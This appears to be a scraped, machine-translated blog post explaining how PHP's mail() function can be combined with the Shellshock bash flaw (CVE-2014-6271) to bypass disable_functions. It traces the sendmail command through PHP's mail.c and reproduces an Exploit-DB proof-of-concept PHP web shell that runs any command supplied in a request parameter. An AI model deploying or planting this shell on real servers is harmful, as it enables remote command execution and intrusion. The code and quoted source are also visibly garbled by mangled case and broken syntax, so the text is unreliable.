PHP Execute Command Bypass disable_functions

Let's start with the process of calling the mail () function in PHP.
See Source Ext/mail.c

236 lines:

Char *sendmail_path = ini_str ("Sendmail_path"NULL;

Get the Sendmail_path variable from the INI. Let's see what php.ini is saying:

 for Unix only.   as well (default: "Sendmail-t-i"). =

As you can see in the note, the default value for Send_mail is "sendmail-t-i".

Extra_cmd (Some additional parameters passed in by the user) exist, call spprintf to combine Sendmail_path and extra_cmd into a truly executed command-line Sendmail_cmd. Does not exist, it assigns the Sendmail_path directly to the sendmail_cmd.
As follows:

if(!Sendmail_path) {#if (defined Php_win32 | | | defined NETWARE)    /*handle old style win SMTP sending*/    if(Tsendmail (Ini_str ("SMTP"), &tsm_err, &tsm_errmsg, HDR, subject, to, message,NULL,NULL,NULLTSRMLS_CC) = =FAILURE) {      if(tsm_errmsg) {php_error_docref (NULLTSRMLS_CC,e_warning, "%s",tsm_errmsg);      Efree (TSM_ERRMSG); } Else{php_error_docref (NULLTSRMLS_CC,e_warning, "%s",Getsmerrortext (Tsm_err)); } Mail_ret (0); } Mail_ret (1);#ElseMail_ret (0);#endif  }  if(Extra_cmd! =NULL) {spprintf (&sendmail_cmd, 0, "%s%s", Sendmail_path,extra_cmd); } Else{sendmail_cmd=Sendmail_path; }

After execution:

 #  ifdef php_win32  sendmail = Popen_ Ex (Sendmail_cmd, "WB", null ,  TSRMLS_CC);  #   else  /*   Since Popen () doesn ' t indicate if the internal fork () doesn ' t work * (e.g. the shell can ') T is executed) we explicitly set it to 0 to be * sure we don't catch any older errno value.  */  errno  = 0; SendMail  = popen  (Sendmail_cmd, "W" );  #  endif  

Throw the sendmail_cmd to Popen execution.
If the system default SH is Bash,popen it will be thrown to bash execution. The previous bash Shell (cve-2014-6271) vulnerability directly caused us to use the mail () function to execute arbitrary commands, bypassing disable_functions.

Impact Version: PHP versions

FIX: Fix cve-2014-6271

The POC (http://www.exploit-db.com/exploits/35146/) is given as follows:

<?PHP#Exploit title:php 5.x Shellshock Exploit (bypass disable_functions)#Google Dork:none#date:10/31/2014#Exploit Author:ryan King (starfall)#Vendor homepage:http://php.net#Software Link:http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror#version:5.* (tested on 5.6.2)#tested On:debian 7 and CentOS 5 and 6#cve:cve-2014-6271functionShellshock ($cmd) {//Execute a command via cve-2014-6271 @mail. c:283   $tmp=Tempnam(".", "Data"); putenv("php_lol= () {x;};$cmd>$tmp2>&1 "); //in Safe Mode, the user may have only alter environment variableswhose names//begin with the prefixes supplied by this   directive. By default, the users would only have able to set environment Variablesthat//begin with PHP_ (e.g. Php_foo=bar). Note:if this directive IsEmpty,//PHP would let the user modify any environment variable!   Mail("[Email protected]", "", "", "", "-BV");//-BV so we don ' t actuallysend any mail   $output= @file_get_contents($tmp); @unlink($tmp); if($output!= "")return $output; Else return"No output, or not vuln.";}EchoShellshock ($_request["CMD"]);?>

PHP Execute Command Bypass disable_functions